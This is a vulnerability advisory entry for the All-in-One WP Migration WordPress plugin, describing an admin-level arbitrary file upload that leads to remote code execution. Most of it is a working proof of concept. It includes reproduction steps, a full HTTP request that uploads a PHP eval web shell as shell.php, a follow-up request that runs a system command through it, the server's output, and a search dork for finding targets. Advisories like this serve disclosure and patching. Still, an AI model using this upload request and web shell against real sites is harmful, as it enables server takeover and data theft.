WordPress Plugin Vulnerabilities
All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE
Description
The plugin does not validate uploaded files' extension, which allows administrators to upload PHP files on their site, even on multisite installations.
Proof of Concept
To reproduce: - Log in, Click all in one WP migration import to use the import from file function. - Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm_ Import = 1 request. - Change the parameters of “upload-file”, “storage” and “archive”. Insert malicious PHP code into “upload-file”. Submit the request. - Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive] # Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution # Google Dork: inurl:/wp-admin/admin-ajax.php # Date: 23/12/2020 # Exploit Author: YICHENGLIU_chenfeng lab # Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/ # Version: All-in-One WP Migration <=7.38 # Tested on: windows 10(x64) # data in http request : POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797 Content-Length: 740 Origin: http://192.168.9.240 Connection: close Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799 -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name="upload-file"; filename="shell.wpress" Content-Type: application/octet-stream <?php eval($_POST['c']); -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name="priority" 5 -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name="secret_key" 7wD1bP6YC4xB -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name="storage" shell -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name="archive" shell.php -----------------------------3937767834299093780715813797-- ########################## execute shell ########################## POST /wordpresscn/wp-content/plugins/all-in-one-wp-migration/storage/shell/shell.php HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 19 c=system('whoami'); ########################### Execute response ########################### HTTP/1.1 200 OK Date: Fri, 19 Mar 2021 09:00:56 GMT Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 X-Powered-By: PHP/5.6.27 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 1124 desktop-psag0ka\gongfang-9
Affects Plugins
References
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU_chenfeng lab
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)